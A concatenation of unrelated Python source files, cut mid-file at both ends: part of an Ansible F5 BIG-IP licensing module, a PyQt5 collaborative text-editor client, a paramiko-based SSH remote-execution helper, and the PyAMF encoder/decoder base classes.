argument_spec=dict(
dossier_file=dict(),
server=dict(required=True),
key=dict(required=False),
license_file=dict(),
license_options=dict(type='dict'),
password=dict(required=True),
state=dict(default='present', choices=['absent', 'present', 'latest']),
user=dict(required=True, aliases=['username']),
validate_certs=dict(default='yes', type='bool'),
wsdl=dict(default=None)
)
)
state = module.params.get('state')
try:
common = BigIpLicenseCommon(module)
lic_status = common.get_license_activation_status()
if state == "present" and lic_status == 'STATE_ENABLED':
module.exit_json(changed=False)
if state == "absent" and lic_status == 'STATE_DISABLED':
module.exit_json(changed=False)
if state == "present" or state == "latest":
if not bigsuds_found:
raise Exception("The python bigsuds module is required")
obj = BigIpLicenseIControl(module)
if obj.present():
changed = True
else:
module.fail_json(msg="License not installed")
elif state == 'absent':
if not paramiko_found:
raise Exception("The python paramiko module is required")
result = common.absent()
if result:
changed = True
else:
module.fail_json(msg="License not removed")
module.exit_json(changed=changed)
except bigsuds.ConnectionError:
module.fail_json(msg="Could not connect to BIG-IP host")
except socket.timeout:
module.fail_json(msg="Timed out connecting to the BIG-IP")
except UnreachableActivationServerError:
module.fail_json(changed=False, msg="Could not reach the specified activation server to license BIG-IP")
except DossierNotGeneratedError:
module.fail_json(changed=False, msg="Dossier not generated")
except NoLicenseReturnedError as e:
module.fail_json(msg=str(e))
except SSLCertVerifyError:
module.fail_json(msg="SSL certificate verification failed. Use validate_certs=no to bypass this")
except UnprivilegedAccountError:
module.fail_json(msg="You account does not have permission to reload the license!")
from ansible.module_utils.basic import *
from ansible.module_utils.f5 import *
if __name__ == '__main__':
main()
|
|
from PyQt5 import QtCore, QtGui, QtWidgets
from ctxt.client.ui_connect import Ui_ConnectDialog
from ctxt.client.ui_main import Ui_MainWindow
import ctxt.protocol as cp
import ctxt.util as cu
import logging
class ConnectDialog(QtWidgets.QDialog):
"""
Connection dialog.
"""
def __init__(self, parent, address, port, docname, nickname):
super(ConnectDialog, self).__init__(parent)
self.log = logging.getLogger("CT.Client.ConnectDlg")
# pyuic5 ../../ui/connect.ui -o ui_connect.py
# Loads the UI from the generated python file.
self.content = Ui_ConnectDialog()
self.content.setupUi(self)
self.content.buttonBox.accepted.connect(self.do_connect)
self.content.buttonBox.rejected.connect(self.do_cancel)
self.content.editAddress.setText(address)
self.content.editPort.setText(str(port))
self.content.editName.setText(nickname)
self.content.editDoc.setText(docname)
def do_connect(self):
"""
The "Ok" handler.
"""
self.address = self.content.editAddress.text()
self.port = int(self.content.editPort.text())
self.nickname = self.content.editName.text()
self.docname = self.content.editDoc.text()
def do_cancel(self):
"""
The "Cancel" handler.
"""
self.address = None
self.port = None
self.nickname = None
self.docname = None
@staticmethod
def ask_connection_info(parent, address, port, docname, nickname):
"""
Ask the user for connection parameters.
The function arguments are taken as the default values.
"""
# Pop the modal dialog.
dlg = ConnectDialog(parent, address, port, docname, nickname)
result = dlg.exec_()
# Fetch its results.
return (result == QtWidgets.QDialog.Accepted, dlg.address, dlg.port, dlg.nickname, dlg.docname)
class MainWindow(QtWidgets.QMainWindow):
"""
The main window with the text editor.
"""
def __init__(self, client, address="localhost", port=7777, docname="test", nickname="Anon"):
super(MainWindow, self).__init__()
self.log = logging.getLogger("CT.Client.MainWnd")
self.client = client
self.update_interval = 0.1
# pyrcc5 ../../ui/resources.qrc -o resources_rc.py
# pyuic5 ../../ui/main.ui -o ui_main.py
# Loads the UI from the generated python file.
self.content = Ui_MainWindow()
self.content.setupUi(self)
self.content.actionConnect.triggered.connect(self.show_connect)
# Install an event filter on the text box.
self.content.textEdit.installEventFilter(self)
# Though, disable the text editor until we've managed to join a document.
self.content.textEdit.setDisabled(True)
self.set_address(address)
self.set_port(port)
self.set_nickname(nickname)
self.set_docname(docname)
self.doc_ver = 0
self.active_commit = {"version":0, "sequence":[]}
# Start the update timer
self.update_timer = QtCore.QTimer()
self.update_timer.setSingleShot(False)
self.update_timer.timeout.connect(self.update)
self.update_timer.start(self.update_interval)
self.show()
def set_address(self, address):
"""
Set server IP address or hostname.
"""
self.conn_address = address
def set_port(self, port):
"""
Set server port to connect to.
"""
self.conn_port = int(port)
def set_nickname(self, nickname):
"""
Set our nickname.
"""
self.nickname = nickname
def set_docname(self, docname):
"""
Set the document name to join.
"""
if len(docname) < 1 or len(docname) > 128:
self.docname = "test"
self.log.error("Invalid document name \"{}\"".format(docname))
else:
self.docname = docname
def show_connect(self):
"""
Handler for the "Connect" button.
Shows a pop-up dialog for specifying
connection parameters.
"""
conn = ConnectDialog.ask_connection_info(
self,
self.conn_address, self.conn_port,
self.docname, self.nickname)
if conn[0]:
self.set_address(conn[1])
self.set_port(conn[2])
self.set_nickname(conn[3])
self.set_docname(conn[4])
self.do_connect()
def do_connect(self):
"""
Connect to the server and join the document.
"""
if self.client.connect(self.conn_address, self.conn_port):
self.client.join_doc(self.nickname, self.docname)
def eventFilter(self, widget, event):
"""
Catch events in the text box.
"""
if event.type() == QtCore.QEvent.KeyPress and widget == self.content.textEdit:
key = event.key()
u = unicode(event.text())
if key in [QtCore.Qt.Key_Return, QtCore.Qt.Key_Enter]:
self.req_insert('\n')
elif key == QtCore.Qt.Key_Backspace:
# Support for Ctrl+Backspace (removes the previous word).
if event.modifiers() & QtCore.Qt.ControlModifier:
self.req_remove_word(-1)
else:
self.req_remove(-1)
elif key == QtCore.Qt.Key_Delete:
# Support for Ctrl+Delete (removes the next word).
if event.modifiers() & QtCore.Qt.ControlModifier:
self.req_remove_word(1)
else:
self.req_remove(1)
elif key == QtCore.Qt.Key_Escape:
self.close()
elif cu.u_is_printable(u):
self.req_insert(u)
# Handle the rest
return QtWidgets.QWidget.eventFilter(self, widget, event)
def req_insert(self, text):
"""
Generate a text insertion request.
"""
cursor = self.content.textEdit.textCursor().position()
d = {
"id": cp.Protocol.RES_INSERT,
"cursor": cursor,
"text": text,
"name": self.nickname
}
self.active_commit["sequence"].append(d)
def req_remove(self, length):
"""
Generate a text removal request.
"""
cursor = self.content.textEdit.textCursor().position()
# We shouldn't send negative length to the server.
# So, we'll remap the cursor position and length.
if length < 0:
length = abs(length)
cursor -= length
# And produce the message.
d = {
"id": cp.Protocol.RES_REMOVE,
"cursor": cursor,
"length": length,
"name": self.nickname
}
self.active_commit["sequence"].append(d)
def req_remove_word(self, direction):
"""
Generate a request to remove a word
relative to the cursor position.
"""
# Select the word left or right to the cursor.
cursor = self.content.textEdit.textCursor()
if direction > 0:
cursor.movePosition(QtGui.QTextCursor.WordRight, QtGui.QTextCursor.KeepAnchor)
else:
cursor.movePosition(QtGui.QTextCursor.WordLeft, QtGui.QTextCursor.KeepAnchor)
# Get selection length
length = cursor.selectionEnd() - cursor.selectionStart()
# And produce the message.
d = {
"id": cp.Protocol.REQ_REMOVE,
"cursor": cursor.selectionStart(),
"length": length,
"name": self.nickname
}
self.active_commit["sequence"].append(d)
def process_commit(self, commit):
"""
Process a commit message.
"""
for op in commit.sequence:
self.log.debug("Processing commit {}".format(op))
op_id = op["id"]
if "name" in op:
op_name = op["name"]
if "cursor" in op:
op_cursor = op["cursor"]
if "length" in op:
op_len = op["length"]
if "text" in op:
op_text = op["text"]
# NOTE:: Remove this, eventually
if op_name == self.nickname:
continue
# Someone inserted some text?
if op_id == cp.Protocol.RES_INSERT:
self.log.debug(u"{} inserted at {}: \"{}\"".format(
op_name, op_cursor, op_text))
# Generate a cursor at the desired position
# and insert the text there.
cursor = self.content.textEdit.textCursor()
cursor.setPosition(op_cursor)
cursor.insertText(op_text)
# Someone removed some text?
elif op_id == cp.Protocol.RES_REMOVE:
self.log.debug(u"{} removed {}-{}".format(
op_name, op_cursor, op_len))
# Generate the desired selection and remove the text.
cursor = self.content.textEdit.textCursor()
cursor.setPosition(op_cursor)
cursor.movePosition(QtGui.QTextCursor.Right, QtGui.QTextCursor.KeepAnchor, op_len)
cursor.removeSelectedText()
def update(self):
"""
Check for any updates from the server,
and schedule the next update.
"""
if not self.client.online:
return
# Send the active commit.
if self.active_commit["sequence"] != []:
self.active_commit["version"] = self.doc_ver
print("Sending commit {}".format(self.active_commit))
self.client.commit(self.active_commit)
# Reset the commit
self.active_commit["sequence"] = []
self.client.update()
# Anything in the queue?
if not self.client.queue_sc.empty():
msg = self.client.queue_sc.get()
# We've joined? Party?
if msg.id == cp.Protocol.RES_OK and msg.req_id == cp.Protocol.REQ_JOIN:
pass
# We've received full text?
elif msg.id == cp.Protocol.RES_TEXT:
self.content.textEdit.setText(msg.text)
# Enable the text editor
self.content.textEdit.setDisabled(False)
# A new commit?
elif msg.id == cp.Protocol.RES_COMMIT:
self.log.debug("Received commit {:08X}".format(msg.version))
# TODO:: Merging here
self.process_commit(msg)
def closeEvent(self, event):
"""
Handler for the window close event.
"""
self.client.close()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""SSH Module for connecting to and automating remote commands.
Supports proxying through an ssh tunnel ('gateway' keyword argument.)
To control the behavior of the SSH client, use the specific connect_with_*
calls. The .connect() call behaves like the ssh command and attempts a number
of connection methods, including using the curent user's ssh keys.
If interactive is set to true, the module will also prompt for a password if no
other connection methods succeeded.
Note that test_connection() calls connect(). To test a connection and control
the authentication methods used, just call connect_with_* and catch any
exceptions instead of using test_connect().
"""
import ast
import getpass
import logging
import os
import re
import time
import paramiko
import six
from satori import errors
from satori import utils
LOG = logging.getLogger(__name__)
MIN_PASSWORD_PROMPT_LEN = 8
MAX_PASSWORD_PROMPT_LEN = 64
TEMPFILE_PREFIX = ".satori.tmp.key."
TTY_REQUIRED = [
"you must have a tty to run sudo",
"is not a tty",
"no tty present",
"must be run from a terminal",
]
def shellquote(s):
r"""Quote a string for use on a command line.
This wraps the string in single-quotes and converts any existing
single-quotes to r"'\''". Here the first single-quote ends the
previous quoting, the escaped single-quote becomes a literal
single-quote, and the last single-quote quotes the next part of
the string.
"""
return "'%s'" % s.replace("'", r"'\''")
def make_pkey(private_key):
"""Return a paramiko.pkey.PKey from private key string."""
key_classes = [paramiko.rsakey.RSAKey,
paramiko.dsskey.DSSKey,
paramiko.ecdsakey.ECDSAKey, ]
keyfile = six.StringIO(private_key)
for cls in key_classes:
keyfile.seek(0)
try:
pkey = cls.from_private_key(keyfile)
except paramiko.SSHException:
continue
else:
keytype = cls
LOG.info("Valid SSH Key provided (%s)", keytype.__name__)
return pkey
raise paramiko.SSHException("Is not a valid private key")
def connect(*args, **kwargs):
"""Connect to a remote device over SSH."""
try:
return SSH.get_client(*args, **kwargs)
except TypeError as exc:
msg = "got an unexpected"
if msg in str(exc):
message = "%s " + str(exc)[str(exc).index(msg):]
raise exc.__class__(message % "connect()")
raise
class AcceptMissingHostKey(paramiko.client.MissingHostKeyPolicy):
"""Allow connections to hosts whose fingerprints are not on record."""
# pylint: disable=R0903
def missing_host_key(self, client, hostname, key):
"""Add missing host key."""
# pylint: disable=W0212
client._host_keys.add(hostname, key.get_name(), key)
class SSH(paramiko.SSHClient): # pylint: disable=R0902
"""Connects to devices via SSH to execute commands."""
# pylint: disable=R0913
def __init__(self, host, password=None, username="root", private_key=None,
root_password=None, key_filename=None, port=22,
timeout=20, gateway=None, options=None, interactive=False):
"""Create an instance of the SSH class.
:param str host: The ip address or host name of the server
to connect to
:param str password: A password to use for authentication
or for unlocking a private key
:param username: The username to authenticate as
:param root_password: root user password to be used if 'username'
is not root. This will use 'username' and
'password to login and then 'su' to root
using root_password
:param private_key: Private SSH Key string to use
(instead of using a filename)
:param key_filename: a private key filename (path)
:param port: tcp/ip port to use (defaults to 22)
:param float timeout: an optional timeout (in seconds) for the
TCP connection
:param socket gateway: an existing SSH instance to use
for proxying
:param dict options: A dictionary used to set ssh options
(when proxying).
e.g. for `ssh -o StrictHostKeyChecking=no`,
you would provide
(.., options={'StrictHostKeyChecking': 'no'})
Conversion of booleans is also supported,
(.., options={'StrictHostKeyChecking': False})
is equivalent.
:keyword interactive: If true, prompt for password if missing.
"""
self.password = password
self.host = host
self.username = username or 'root'
self.root_password = root_password
self.private_key = private_key
self.key_filename = key_filename
self.port = port or 22
self.timeout = timeout
self._platform_info = None
self.options = options or {}
self.gateway = gateway
self.sock = None
self.interactive = interactive
self.escalation_command = 'sudo -i %s'
if self.root_password:
self.escalation_command = "su -c '%s'"
if self.gateway:
if not isinstance(self.gateway, SSH):
raise TypeError("'gateway' must be a satori.ssh.SSH instance. "
"( instances of this type are returned by "
"satori.ssh.connect() )")
super(SSH, self).__init__()
def __del__(self):
"""Destructor to close the connection."""
self.close()
@classmethod
def get_client(cls, *args, **kwargs):
"""Return an ssh client object from this module."""
return cls(*args, **kwargs)
@property
def platform_info(self):
"""Return distro, version, architecture.
Requires >= Python 2.4 on remote system.
"""
if not self._platform_info:
platform_command = "import platform,sys\n"
platform_command += utils.get_source_definition(
utils.get_platform_info)
platform_command += ("\nsys.stdout.write(str("
"get_platform_info()))\n")
command = 'echo %s | python' % shellquote(platform_command)
output = self.remote_execute(command)
stdout = re.split('\n|\r\n', output['stdout'])[-1].strip()
if stdout:
try:
plat = ast.literal_eval(stdout)
except SyntaxError as exc:
plat = {'dist': 'unknown'}
LOG.warning("Error parsing response from host '%s': %s",
self.host, output, exc_info=exc)
else:
plat = {'dist': 'unknown'}
LOG.warning("Blank response from host '%s': %s",
self.host, output)
self._platform_info = plat
return self._platform_info
def connect_with_host_keys(self):
"""Try connecting with locally available keys (ex. ~/.ssh/id_rsa)."""
LOG.debug("Trying to connect with local host keys")
return self._connect(look_for_keys=True, allow_agent=False)
def connect_with_password(self):
"""Try connecting with password."""
LOG.debug("Trying to connect with password")
if self.interactive and not self.password:
LOG.debug("Prompting for password (interactive=%s)",
self.interactive)
try:
self.password = getpass.getpass("Enter password for %s:" %
self.username)
except KeyboardInterrupt:
LOG.debug("User cancelled at password prompt")
if not self.password:
raise paramiko.PasswordRequiredException("Password not provided")
return self._connect(
password=self.password,
look_for_keys=False,
allow_agent=False)
def connect_with_key_file(self):
"""Try connecting with key file."""
LOG.debug("Trying to connect with key file")
if not self.key_filename:
raise paramiko.AuthenticationException("No key file supplied")
return self._connect(
key_filename=os.path.expanduser(self.key_filename),
look_for_keys=False,
allow_agent=False)
def connect_with_key(self):
"""Try connecting with key string."""
LOG.debug("Trying to connect with private key string")
if not self.private_key:
raise paramiko.AuthenticationException("No key supplied")
pkey = make_pkey(self.private_key)
return self._connect(
pkey=pkey,
look_for_keys=False,
allow_agent=False)
def _connect(self, **kwargs):
"""Set up client and connect to target."""
self.load_system_host_keys()
if self.options.get('StrictHostKeyChecking') in (False, "no"):
self.set_missing_host_key_policy(AcceptMissingHostKey())
if self.gateway:
# lazy load
if not self.gateway.get_transport():
self.gateway.connect()
self.sock = self.gateway.get_transport().open_channel(
'direct-tcpip', (self.host, self.port), ('', 0))
return super(SSH, self).connect(
self.host,
timeout=kwargs.pop('timeout', self.timeout),
port=kwargs.pop('port', self.port),
username=kwargs.pop('username', self.username),
pkey=kwargs.pop('pkey', None),
sock=kwargs.pop('sock', self.sock),
**kwargs)
def connect(self): # pylint: disable=W0221
"""Attempt an SSH connection through paramiko.SSHClient.connect.
The order for authentication attempts is:
- private_key
- key_filename
- any key discoverable in ~/.ssh/
- username/password (will prompt if the password is not supplied and
interactive is true)
"""
# idempotency
if self.get_transport():
if self.get_transport().is_active():
return
if self.private_key:
try:
return self.connect_with_key()
except paramiko.SSHException:
pass # try next method
if self.key_filename:
try:
return self.connect_with_key_file()
except paramiko.SSHException:
pass # try next method
try:
return self.connect_with_host_keys()
except paramiko.SSHException:
pass # try next method
try:
return self.connect_with_password()
except paramiko.BadHostKeyException as exc:
msg = (
"ssh://%s@%s:%d failed: %s. You might have a bad key "
"entry on your server, but this is a security issue and "
"won't be handled automatically. To fix this you can remove "
"the host entry for this host from the /.ssh/known_hosts file")
LOG.info(msg, self.username, self.host, self.port, exc)
raise exc
except Exception as exc:
LOG.info('ssh://%s@%s:%d failed. %s',
self.username, self.host, self.port, exc)
raise exc
def test_connection(self):
"""Connect to an ssh server and verify that it responds.
The order for authentication attempts is:
(1) private_key
(2) key_filename
(3) any key discoverable in ~/.ssh/
(4) username/password
"""
LOG.debug("Checking for a response from ssh://%s@%s:%d.",
self.username, self.host, self.port)
try:
self.connect()
LOG.debug("ssh://%s@%s:%d is up.",
self.username, self.host, self.port)
return True
except Exception as exc:
LOG.info("ssh://%s@%s:%d failed. %s",
self.username, self.host, self.port, exc)
return False
finally:
self.close()
def close(self):
"""Close the connection to the remote host.
If an ssh tunnel is being used, close that first.
"""
if self.gateway:
self.gateway.close()
return super(SSH, self).close()
def _handle_tty_required(self, results, get_pty):
"""Determine whether the result implies a tty request."""
if any(m in str(k) for m in TTY_REQUIRED for k in results.values()):
LOG.info('%s requires TTY for sudo/su. Using TTY mode.',
self.host)
if get_pty is True: # if this is *already* True
raise errors.GetPTYRetryFailure(
"Running command with get_pty=True FAILED: %s@%s:%d"
% (self.username, self.host, self.port))
else:
return True
return False
def _handle_password_prompt(self, stdin, stdout, su_auth=False):
"""Determine whether the remote host is prompting for a password.
Respond to the prompt through stdin if applicable.
"""
if not stdout.channel.closed:
buflen = len(stdout.channel.in_buffer)
# min and max determined from max username length
# and a set of encountered linux password prompts
if MIN_PASSWORD_PROMPT_LEN < buflen < MAX_PASSWORD_PROMPT_LEN:
prompt = stdout.channel.recv(buflen)
if all(m in prompt.lower()
for m in ['password', ':']):
LOG.warning("%s@%s encountered prompt! of length "
" [%s] {%s}",
self.username, self.host, buflen, prompt)
if su_auth:
LOG.warning("Escalating using 'su -'.")
stdin.write("%s\n" % self.root_password)
else:
stdin.write("%s\n" % self.password)
stdin.flush()
return True
else:
LOG.warning("Nearly a False-Positive on "
"password prompt detection. [%s] {%s}",
buflen, prompt)
stdout.channel.send(prompt)
return False
def _command_is_already_running(self, command):
"""Check to see if the command is already running using ps & grep."""
# check plain 'command' w/o prefix or escalation
check_cmd = 'ps -ef |grep -v grep|grep -c "%s"' % command
result = self.remote_execute(check_cmd, keepalive=True,
allow_many=True)
if result['stdout'] != '0':
return True
else:
LOG.debug("Remote command %s IS NOT already running. "
"Continuing with remote_execute.", command)
def remote_execute(self, command, with_exit_code=False, # noqa
get_pty=False, cwd=None, keepalive=True,
escalate=False, allow_many=True, **kw):
"""Execute an ssh command on a remote host.
Tries cert auth first and falls back
to password auth if password provided.
:param command: Shell command to be executed by this function.
:param with_exit_code: Include the exit_code in the return body.
:param cwd: The child's current directory will be changed
to `cwd` before it is executed. Note that this
directory is not considered when searching the
executable, so you can't specify the program's
path relative to this argument
:param get_pty: Request a pseudo-terminal from the server.
:param allow_many: If False, do not run command if it is already
found running on remote client.
:returns: a dict with stdin, stdout,
and (optionally) the exit code of the call.
"""
if escalate and self.username != 'root':
run_command = self.escalation_command % command
else:
run_command = command
if cwd:
prefix = "cd %s && " % cwd
run_command = prefix + run_command
# _command_is_already_running wont be called if allow_many is True
# python is great :)
if not allow_many and self._command_is_already_running(command):
raise errors.SatoriDuplicateCommandException(
"Remote command %s is already running and allow_many was "
"set to False. Aborting remote_execute." % command)
try:
self.connect()
results = None
chan = self.get_transport().open_session()
su_auth = False
if 'su -' in run_command:
su_auth = True
get_pty = True
if get_pty:
chan.get_pty()
stdin = chan.makefile('wb')
stdout = chan.makefile('rb')
stderr = chan.makefile_stderr('rb')
LOG.debug("Executing '%s' on ssh://%s@%s:%s.",
run_command, self.username, self.host, self.port)
chan.exec_command(run_command)
LOG.debug('ssh://%s@%s:%d responded.', self.username, self.host,
self.port)
time.sleep(.25)
self._handle_password_prompt(stdin, stdout, su_auth=su_auth)
results = {
'stdout': stdout.read().strip(),
'stderr': stderr.read()
}
LOG.debug("STDOUT from ssh://%s@%s:%d: %.5000s ...",
self.username, self.host, self.port,
results['stdout'])
LOG.debug("STDERR from ssh://%s@%s:%d: %.5000s ...",
self.username, self.host, self.port,
results['stderr'])
exit_code = chan.recv_exit_status()
if with_exit_code:
results.update({'exit_code': exit_code})
if not keepalive:
chan.close()
if self._handle_tty_required(results, get_pty):
return self.remote_execute(
command, with_exit_code=with_exit_code, get_pty=True,
cwd=cwd, keepalive=keepalive, escalate=escalate,
allow_many=allow_many)
return results
except Exception as exc:
LOG.info("ssh://%s@%s:%d failed. | %s", self.username, self.host,
self.port, exc)
raise
finally:
if not keepalive:
self.close()
# Share SSH.__init__'s docstring
connect.__doc__ = SSH.__init__.__doc__
try:
SSH.__dict__['get_client'].__doc__ = SSH.__dict__['__init__'].__doc__
except AttributeError:
SSH.get_client.__func__.__doc__ = SSH.__init__.__doc__
|
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
Provides basic functionality for all pyamf.amf?.[De|E]ncoder classes.
"""
import types
import datetime
import pyamf
from pyamf import util, python, xml
__all__ = [
'IndexedCollection',
'Context',
'Decoder',
'Encoder'
]
try:
unicode
except NameError:
# py3k support
unicode = str
str = bytes
class IndexedCollection(object):
"""
Store references to objects and provides an api to query references.
All reference checks are done using the builtin C{id} function unless
C{use_hash} is specified as C{True} where the slower but more flexible
C{hash} builtin is used.
@note: All attributes on the instance are private, use the apis only.
"""
def __init__(self, use_hash=False):
if use_hash is True:
self.func = hash
else:
self.func = id
self.clear()
def clear(self):
"""
Clears the collection.
"""
self.list = []
self.dict = {}
def getByReference(self, ref):
"""
Returns an object based on the supplied reference. The C{ref} should
be an C{int}.
If the reference is not found, C{None} will be returned.
"""
try:
return self.list[ref]
except IndexError:
return None
def getReferenceTo(self, obj):
"""
Returns a reference to C{obj} if it is contained within this index.
If the object is not contained within the collection, C{-1} will be
returned.
@param obj: The object to find the reference to.
@return: An C{int} representing the reference or C{-1} is the object
is not contained within the collection.
"""
return self.dict.get(self.func(obj), -1)
def append(self, obj):
"""
Appends C{obj} to this index.
@note: Uniqueness is not checked
@return: The reference to C{obj} in this index.
"""
h = self.func(obj)
self.list.append(obj)
idx = len(self.list) - 1
self.dict[h] = idx
return idx
def __eq__(self, other):
if isinstance(other, list):
return self.list == other
raise NotImplementedError("cannot compare %s to %r" % (
type(other), self))
def __len__(self):
return len(self.list)
def __getitem__(self, idx):
return self.getByReference(idx)
def __contains__(self, obj):
r = self.getReferenceTo(obj)
return r != -1
def __repr__(self):
t = self.__class__
return '<%s.%s size=%d 0x%x>' % (
t.__module__,
t.__name__,
len(self.list),
id(self))
class ByteStringReferenceCollection(IndexedCollection):
"""
There have been rare hash collisions within a single AMF payload causing
corrupt payloads.
Which strings cause collisions is dependent on the python runtime, each
platform might have a slightly different implementation which means that
testing is extremely difficult.
"""
def __init__(self, *args, **kwargs):
super(ByteStringReferenceCollection, self).__init__(use_hash=False)
def getReferenceTo(self, byte_string):
return self.dict.get(byte_string, -1)
def append(self, byte_string):
self.list.append(byte_string)
idx = len(self.list) - 1
self.dict[byte_string] = idx
return idx
class Context(object):
"""
The base context for all AMF [de|en]coding.
@ivar extra: This is a placeholder for any extra contextual data that
required for different adapters.
@type extra: C{dict}
@ivar _objects: A collection of stored references to objects that have
already been visited by this context.
@type _objects: L{IndexedCollection}
@ivar _class_aliases: Lookup of C{class} -> L{pyamf.ClassAlias} as
determined by L{pyamf.get_class_alias}
@ivar _unicodes: Lookup of utf-8 encoded byte strings -> string objects
(aka strings/unicodes).
@ivar forbid_dtd: Don't allow DTD in XML documents (decode only). By
default PyAMF will not support potentially malicious XML documents
- e.g. XXE.
@ivar forbid_entities: Don't allow entities in XML documents (decode only).
By default PyAMF will not support potentially malicious XML documents
- e.g. XXE.
"""
def __init__(self, forbid_dtd=True, forbid_entities=True):
self._objects = IndexedCollection()
self.forbid_entities = forbid_entities
self.forbid_dtd = forbid_dtd
self.clear()
def clear(self):
"""
Clears the context.
"""
self._objects.clear()
self._class_aliases = {}
self._unicodes = {}
self.extra = {}
def getObject(self, ref):
"""
Gets an object based on a reference.
@type ref: C{int}
@return: The referenced object or C{None} if not found.
"""
return self._objects.getByReference(ref)
def getObjectReference(self, obj):
"""
Gets a reference for an already referenced object.
@return: The reference to the object or C{-1} if the object is not in
the context.
"""
return self._objects.getReferenceTo(obj)
def addObject(self, obj):
"""
Adds a reference to C{obj}.
@return: Reference to C{obj}.
@rtype: C{int}
"""
return self._objects.append(obj)
def getClassAlias(self, klass):
"""
Gets a class alias based on the supplied C{klass}. If one is not found
in the global context, one is created locally.
If you supply a string alias and the class is not registered,
L{pyamf.UnknownClassAlias} will be raised.
@param klass: A class object or string alias.
@return: The L{pyamf.ClassAlias} instance that describes C{klass}
"""
try:
return self._class_aliases[klass]
except KeyError:
pass
try:
alias = self._class_aliases[klass] = pyamf.get_class_alias(klass)
except pyamf.UnknownClassAlias:
if isinstance(klass, python.str_types):
raise
# no alias has been found yet .. check subclasses
alias = util.get_class_alias(klass) or pyamf.ClassAlias
meta = util.get_class_meta(klass)
alias = alias(klass, defer=True, **meta)
self._class_aliases[klass] = alias
return alias
def getStringForBytes(self, s):
"""
Returns the corresponding string for the supplied utf-8 encoded bytes.
If there is no string object, one is created.
@since: 0.6
"""
u = self._unicodes.get(s, None)
if u is not None:
return u
u = self._unicodes[s] = s.decode('utf-8')
return u
def getBytesForString(self, u):
"""
Returns the corresponding utf-8 encoded string for a given unicode
object. If there is no string, one is encoded.
@since: 0.6
"""
s = self._unicodes.get(u, None)
if s is not None:
return s
s = self._unicodes[u] = u.encode('utf-8')
return s
class _Codec(object):
"""
Base codec.
@ivar stream: The underlying data stream.
@type stream: L{util.BufferedByteStream}
@ivar context: The context for the encoding.
@ivar strict: Whether the codec should operate in I{strict} mode.
@type strict: C{bool}, default is C{False}.
@ivar timezone_offset: The offset from I{UTC} for any C{datetime} objects
being encoded. Default to C{None} means no offset.
@type timezone_offset: C{datetime.timedelta} or C{int} or C{None}
"""
def __init__(self, stream=None, context=None, strict=False,
timezone_offset=None, forbid_dtd=True, forbid_entities=True):
if isinstance(stream, basestring) or stream is None:
stream = util.BufferedByteStream(stream)
self.stream = stream
self.context = context or self.buildContext(
forbid_dtd=forbid_dtd,
forbid_entities=forbid_entities
)
self.strict = strict
self.timezone_offset = timezone_offset
self._func_cache = {}
def buildContext(self, **kwargs):
"""
A context factory.
"""
raise NotImplementedError
def getTypeFunc(self, data):
"""
Returns a callable based on C{data}. If no such callable can be found,
the default must be to return C{None}.
"""
raise NotImplementedError
class Decoder(_Codec):
"""
Base AMF decoder.
Supports an generator interface. Feed the decoder data using L{send} and
get Python objects out by using L{next}.
@ivar strict: Defines how strict the decoding should be. For the time
being this relates to typed objects in the stream that do not have a
registered alias. Introduced in 0.4.
@type strict: C{bool}
"""
def __init__(self, *args, **kwargs):
_Codec.__init__(self, *args, **kwargs)
self.__depth = 0
def send(self, data):
"""
Add data for the decoder to work on.
"""
self.stream.append(data)
def next(self):
"""
Part of the iterator protocol.
"""
try:
return self.readElement()
except pyamf.EOStream:
# all data was successfully decoded from the stream
raise StopIteration
def finalise(self, payload):
"""
Finalise the payload.
This provides a useful hook to adapters to modify the payload that was
decoded.
Note that this is an advanced feature and is NOT directly called by the
decoder.
"""
for c in pyamf.POST_DECODE_PROCESSORS:
payload = c(payload, self.context.extra)
return payload
def _readElement(self):
"""
Reads an AMF3 element from the data stream.
@raise DecodeError: The ActionScript type is unsupported.
@raise EOStream: No more data left to decode.
"""
pos = self.stream.tell()
try:
t = self.stream.read(1)
except IOError:
raise pyamf.EOStream
try:
func = self._func_cache[t]
except KeyError:
func = self.getTypeFunc(t)
if not func:
raise pyamf.DecodeError("Unsupported ActionScript type %s" % (
hex(ord(t)),))
self._func_cache[t] = func
try:
return func()
except IOError:
self.stream.seek(pos)
raise
def readElement(self):
"""
Reads an AMF3 element from the data stream.
@raise DecodeError: The ActionScript type is unsupported.
@raise EOStream: No more data left to decode.
"""
self.__depth += 1
try:
element = self._readElement()
finally:
self.__depth -= 1
if self.__depth == 0:
element = self.finalise(element)
return element
def __iter__(self):
return self
class _CustomTypeFunc(object):
"""
Support for custom type mappings when encoding.
"""
def __init__(self, encoder, func):
self.encoder = encoder
self.func = func
def __call__(self, data, **kwargs):
ret = self.func(data, encoder=self.encoder)
if ret is not None:
self.encoder.writeElement(ret)
class Encoder(_Codec):
"""
Base AMF encoder.
When using this to encode arbitrary object, the only 'public' method is
C{writeElement} all others are private and are subject to change in future
versions.
The encoder also supports an generator interface. Feed the encoder Python
object using L{send} and get AMF bytes out using L{next}.
"""
def __init__(self, *args, **kwargs):
_Codec.__init__(self, *args, **kwargs)
self.bucket = []
def _write_type(self, obj, **kwargs):
"""
Subclasses should override this and all write[type] functions
"""
raise NotImplementedError
writeNull = _write_type
writeBytes = _write_type
writeString = _write_type
writeBoolean = _write_type
writeNumber = _write_type
writeList = _write_type
writeUndefined = _write_type
writeDate = _write_type
writeXML = _write_type
writeObject = _write_type
def writeSequence(self, iterable):
"""
Encodes an iterable. The default is to write If the iterable has an al
"""
try:
alias = self.context.getClassAlias(iterable.__class__)
except (AttributeError, pyamf.UnknownClassAlias):
self.writeList(list(iterable))
return
if alias.external:
# a is a subclassed list with a registered alias - push to the
# correct method
self.writeObject(iterable)
return
self.writeList(list(iterable))
def writeGenerator(self, gen):
"""
Iterates over a generator object and encodes all that is returned.
"""
n = getattr(gen, 'next')
while True:
try:
self.writeElement(n())
except StopIteration:
break
def getTypeFunc(self, data):
"""
Returns a callable that will encode C{data} to C{self.stream}. If
C{data} is unencodable, then C{None} is returned.
"""
if data is None:
return self.writeNull
t = type(data)
# try types that we know will work
if t is str or issubclass(t, str):
return self.writeBytes
if t is unicode or issubclass(t, unicode):
